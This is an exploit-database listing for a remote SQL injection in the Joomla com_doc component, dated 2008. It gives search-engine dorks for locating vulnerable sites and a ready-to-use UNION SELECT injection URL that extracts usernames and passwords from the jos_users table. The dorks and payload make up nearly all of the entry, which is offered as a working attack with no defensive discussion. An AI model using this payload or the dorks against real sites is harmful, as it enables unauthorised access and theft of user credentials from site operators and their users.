Joomla Component com_doc Remote SQL Injection Vulnerability

2008-02-07T00:00:00
ID 1337DAY-ID-2612
Type zdt
Reporter [email protected]
Modified 2008-02-07T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
Joomla Component com_doc Remote SQL Injection Vulnerability
===========================================================



#########################################################################
#
# Commonwealth Business Council SQL Injection
#
#########################################################################
#
# DORK 1 : allinurl: "index.php?option=com_doc"
#
# DORK 2: "Commonwealth Business Council
#
##########################################################################
EXPLOIT :

index.php?option=com_doc&task=view&sid=-1/**/union/**/select/**/concat(username,0x3a,password),1,2,concat(username,0x3a,password),0x3a,5,6,7,8,password,username,11/**/from/**/jos_users/






#  0day.today [2018-04-11]  #